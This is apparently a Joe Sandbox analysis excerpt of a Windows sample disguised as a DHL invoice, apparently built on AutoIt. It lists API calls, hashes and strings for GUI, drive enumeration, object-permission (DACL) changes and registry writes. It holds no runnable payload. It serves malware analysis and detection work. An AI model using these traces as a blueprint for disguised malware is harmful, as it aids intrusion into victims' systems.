                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                        • String ID: 0$xV
                                                                                                                        • API String ID: 2760611726-4207226023
                                                                                                                        • Opcode ID: 8d28a93bcbc8230c57210f5d1d60ffe34123cab7fc3f653e841107345a8f4329
                                                                                                                        • Instruction ID: f0819ad5859bbb569006bfb543da91db37a5760e6f40e7f1e65dd70b3916c996
                                                                                                                        • Opcode Fuzzy Hash: 8d28a93bcbc8230c57210f5d1d60ffe34123cab7fc3f653e841107345a8f4329
                                                                                                                        • Instruction Fuzzy Hash: D912AB30600201DFDB27EF24C995BAAB7E9FB44300F1544A9E589DB662CB31FC92DB91
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 003B273E
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003B286A
                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 003B28A9
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 003B28B9
                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 003B2900
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 003B290C
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 003B2955
                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003B2964
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 003B2974
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 003B2978
                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 003B2988
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B2991
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 003B299A
                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003B29C6
                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 003B29DD
                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 003B2A1D
                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003B2A31
                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 003B2A42
                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 003B2A77
                                                                                                                        • GetStockObject.GDI32(00000011), ref: 003B2A82
                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003B2A8D
                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 003B2A97
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                        • Opcode ID: d3acf987375aa4005f98f9d9ed8871945171250656263509393ffb4df2e5bdad
                                                                                                                        • Instruction ID: 47d3c41e0db9b6075c80a6dae26884b68283f6b53f1be8cacb8f46508ac3dabc
                                                                                                                        • Opcode Fuzzy Hash: d3acf987375aa4005f98f9d9ed8871945171250656263509393ffb4df2e5bdad
                                                                                                                        • Instruction Fuzzy Hash: 32B16F71A10215AFEB15DF69CD8AFAF7BA9EB09714F004114FA14EB6A0D770ED40CB54
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003A4AED
                                                                                                                        • GetDriveTypeW.KERNEL32(?,003CCB68,?,\\.\,003CCC08), ref: 003A4BCA
                                                                                                                        • SetErrorMode.KERNEL32(00000000,003CCB68,?,\\.\,003CCC08), ref: 003A4D36
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DriveType
                                                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                        • API String ID: 2907320926-4222207086
                                                                                                                        • Opcode ID: 227e30be2bde072378effecdcf45e15c7c83f351bb0b3d01b212f9c5d569f69e
                                                                                                                        • Instruction ID: 8e601fa9b2b52eda7385b550fa07c232c82e35b140d6f3e6617f19caf608e3cb
                                                                                                                        • Opcode Fuzzy Hash: 227e30be2bde072378effecdcf45e15c7c83f351bb0b3d01b212f9c5d569f69e
                                                                                                                        • Instruction Fuzzy Hash: 0061D330605309EBCB07DF28CA83DBC77B4EB86350B248415F90AABA56DBB1ED41DB51
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000012), ref: 003C7421
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 003C7425
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 003C743B
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 003C7446
                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 003C744B
                                                                                                                        • GetSysColor.USER32(00000011), ref: 003C7463
                                                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003C7471
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 003C7482
                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 003C748B
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003C7498
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003C74B7
                                                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003C74CE
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C74DB
                                                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003C752A
                                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003C7554
                                                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 003C7572
                                                                                                                        • DrawFocusRect.USER32(?,?), ref: 003C757D
                                                                                                                        • GetSysColor.USER32(00000011), ref: 003C758E
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 003C7596
                                                                                                                        • DrawTextW.USER32(?,003C70F5,000000FF,?,00000000), ref: 003C75A8
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003C75BF
                                                                                                                        • DeleteObject.GDI32(?), ref: 003C75CA
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003C75D0
                                                                                                                        • DeleteObject.GDI32(?), ref: 003C75D5
                                                                                                                        • SetTextColor.GDI32(?,?), ref: 003C75DB
                                                                                                                        • SetBkColor.GDI32(?,?), ref: 003C75E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1996641542-0
                                                                                                                        • Opcode ID: 5e12cd954658790bbd080e6d3e6394a13a5cb7894e99d37bfd11a5d6a90e272f
                                                                                                                        • Instruction ID: 715b4e6cee5a6aebe8a912339a843f62d286d9c097b4e938db49f3cb53a7add1
                                                                                                                        • Opcode Fuzzy Hash: 5e12cd954658790bbd080e6d3e6394a13a5cb7894e99d37bfd11a5d6a90e272f
                                                                                                                        • Instruction Fuzzy Hash: C8615972900218AFDB029FA5DC49EAEBFB9EB09320F155115F919EB2A1D771AD40CF90
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 003C1128
                                                                                                                        • GetDesktopWindow.USER32 ref: 003C113D
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 003C1144
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C1199
                                                                                                                        • DestroyWindow.USER32(?), ref: 003C11B9
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003C11ED
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C120B
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003C121D
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,?), ref: 003C1232
                                                                                                                        • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 003C1245
                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 003C12A1
                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003C12BC
                                                                                                                        • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003C12D0
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 003C12E8
                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 003C130E
                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 003C1328
                                                                                                                        • CopyRect.USER32(?,?), ref: 003C133F
                                                                                                                        • SendMessageW.USER32(00000000,00000412,00000000), ref: 003C13AA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                        • Opcode ID: b8bb5b61e1cde6a897ef62bac4bd09794732bb412181b59c29f8a36f39094080
                                                                                                                        • Instruction ID: d072f7e5bcbb4962c96b3df070fe53ce5d5aba2c2707745c411075c11a1247f3
                                                                                                                        • Opcode Fuzzy Hash: b8bb5b61e1cde6a897ef62bac4bd09794732bb412181b59c29f8a36f39094080
                                                                                                                        • Instruction Fuzzy Hash: 25B16671604341AFD711DF64C984F6ABBE8AB89344F00891CF999DB2A2C771EC44DB92
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003C02E5
                                                                                                                        • _wcslen.LIBCMT ref: 003C031F
                                                                                                                        • _wcslen.LIBCMT ref: 003C0389
                                                                                                                        • _wcslen.LIBCMT ref: 003C03F1
                                                                                                                        • _wcslen.LIBCMT ref: 003C0475
                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003C04C5
                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003C0504
                                                                                                                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                                                                                                                          • Part of subcall function 0039223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00392258
                                                                                                                          • Part of subcall function 0039223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0039228A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 1103490817-719923060
• Opcode ID: 88391434dd26fc6533f9f8e43855adebc272b59e36de61f419c590cb5555ac5f
• Instruction ID: 6d98e9eee2ffa1eadc5d12138b3a0e985c9b8d16ef9273168fcf4f26de49852d
• Opcode Fuzzy Hash: 88391434dd26fc6533f9f8e43855adebc272b59e36de61f419c590cb5555ac5f
• Instruction Fuzzy Hash: BDE19B35208281CFCB1ADF24C591E2AB3E6BF89714F15495CF896AB6A1DB30ED45CB41

APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00348968
• GetSystemMetrics.USER32(00000007), ref: 00348970
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0034899B
• GetSystemMetrics.USER32(00000008), ref: 003489A3
• GetSystemMetrics.USER32(00000004), ref: 003489C8
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003489E5
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003489F5
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00348A28
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00348A3C
• GetClientRect.USER32(00000000,000000FF), ref: 00348A5A
• GetStockObject.GDI32(00000011), ref: 00348A76
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00348A81
  • Part of subcall function 0034912D: GetCursorPos.USER32(?), ref: 00349141
  • Part of subcall function 0034912D: ScreenToClient.USER32(00000000,?), ref: 0034915E
  • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000001), ref: 00349183
  • Part of subcall function 0034912D: GetAsyncKeyState.USER32(00000002), ref: 0034919D
• SetTimer.USER32(00000000,00000000,00000028,003490FC), ref: 00348AA8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
• Opcode ID: 5b6ffdc352d1a73cf8d5ce4c84410de40ed05238ee719a23d1827a935062b7b9
• Instruction ID: a6d4c405e7dc08f85e6c8a23f6d3b57781c2327a42bfb293571dc5b431fe5992
• Opcode Fuzzy Hash: 5b6ffdc352d1a73cf8d5ce4c84410de40ed05238ee719a23d1827a935062b7b9
• Instruction Fuzzy Hash: 6DB17D71A002099FDB16EFA8CD45FAE3BB5FB48314F114229FA15EB2A0DB74E940CB55

APIs
  • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
  • Part of subcall function 003910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
  • Part of subcall function 003910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
  • Part of subcall function 003910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
  • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00390DF5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00390E29
• GetLengthSid.ADVAPI32(?), ref: 00390E40
• GetAce.ADVAPI32(?,00000000,?), ref: 00390E7A
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00390E96
• GetLengthSid.ADVAPI32(?), ref: 00390EAD
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00390EB5
• HeapAlloc.KERNEL32(00000000), ref: 00390EBC
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00390EDD
• CopySid.ADVAPI32(00000000), ref: 00390EE4
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00390F13
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00390F35
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00390F47
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F6E
• HeapFree.KERNEL32(00000000), ref: 00390F75
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F7E
• HeapFree.KERNEL32(00000000), ref: 00390F85
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390F8E
• HeapFree.KERNEL32(00000000), ref: 00390F95
• GetProcessHeap.KERNEL32(00000000,?), ref: 00390FA1
• HeapFree.KERNEL32(00000000), ref: 00390FA8
  • Part of subcall function 00391193: GetProcessHeap.KERNEL32(00000008,00390BB1,?,00000000,?,00390BB1,?), ref: 003911A1
  • Part of subcall function 00391193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00390BB1,?), ref: 003911A8
  • Part of subcall function 00391193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00390BB1,?), ref: 003911B7
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 9118ff68a6fa784a231ee95420e28172719fed76c4b9c8bfb3561ecf612338a6
• Instruction ID: 591d971b0f1597b3d5939c7dfc5c3007eb66dd5c2b79112fbaf8c5791a471300
• Opcode Fuzzy Hash: 9118ff68a6fa784a231ee95420e28172719fed76c4b9c8bfb3561ecf612338a6
• Instruction Fuzzy Hash: D871597290021AAFDF269FA5DC48FAEBBBCFF04300F054115F91AE6291D731AA05CB60

APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BC4BD
• RegCreateKeyExW.ADVAPI32(?,?,00000000,003CCC08,00000000,?,00000000,?,?), ref: 003BC544
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 003BC5A4
• _wcslen.LIBCMT ref: 003BC5F4
• _wcslen.LIBCMT ref: 003BC66F
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 003BC6B2
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 003BC7C1
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 003BC84D
• RegCloseKey.ADVAPI32(?), ref: 003BC881
• RegCloseKey.ADVAPI32(00000000), ref: 003BC88E
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 003BC960
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: 0ef9e21cce5728e4a361f742a103e5afb27f6d80cf1c05079848e87fbae1802f
• Instruction ID: 6f11561fe6292c89576c63abb5bc83f46801c57097d88303a9f37c2d5e22fbd2
• Opcode Fuzzy Hash: 0ef9e21cce5728e4a361f742a103e5afb27f6d80cf1c05079848e87fbae1802f
• Instruction Fuzzy Hash: C01287752142009FDB26DF14C881E6AB7E5EF89718F05885DF98A9B7A2DB31FC41CB81

APIs
• CharUpperBuffW.USER32(?,?), ref: 003C09C6
• _wcslen.LIBCMT ref: 003C0A01
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C0A54
• _wcslen.LIBCMT ref: 003C0A8A
• _wcslen.LIBCMT ref: 003C0B06
• _wcslen.LIBCMT ref: 003C0B81
  • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
  • Part of subcall function 00392BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00392BFA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-4258414348
• Opcode ID: 1efeb9daeccfdde1dbecda061492c0be34fbb97194629e0991d863646eeafa4f
• Instruction ID: f24ed68e8ecccad1ec1a7c4a5ff5d992e74fbc8c0b3e2e6e820fd2c4bb57b205
• Opcode Fuzzy Hash: 1efeb9daeccfdde1dbecda061492c0be34fbb97194629e0991d863646eeafa4f
• Instruction Fuzzy Hash: D0E17935208741DFCB1AEF28C490A2AB7E1BF98314F15895CF8969B762D731ED45CB81
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                        • Opcode ID: d6b6a0f05573936316549639a5926843304a40e639883f248469301292f6536e
                                                                                                                        • Instruction ID: 0d3f1788521cc8f6aa39382c0ff705bae852c994b1549ed7e359c294a2a97f2a
                                                                                                                        • Opcode Fuzzy Hash: d6b6a0f05573936316549639a5926843304a40e639883f248469301292f6536e
                                                                                                                        • Instruction Fuzzy Hash: 5C71163262012A8BCB32DE3CCD415FF3795AB60758F262128FE55ABA85E731DD4583A0
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 003C835A
                                                                                                                        • _wcslen.LIBCMT ref: 003C836E
                                                                                                                        • _wcslen.LIBCMT ref: 003C8391
                                                                                                                        • _wcslen.LIBCMT ref: 003C83B4
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003C83F2
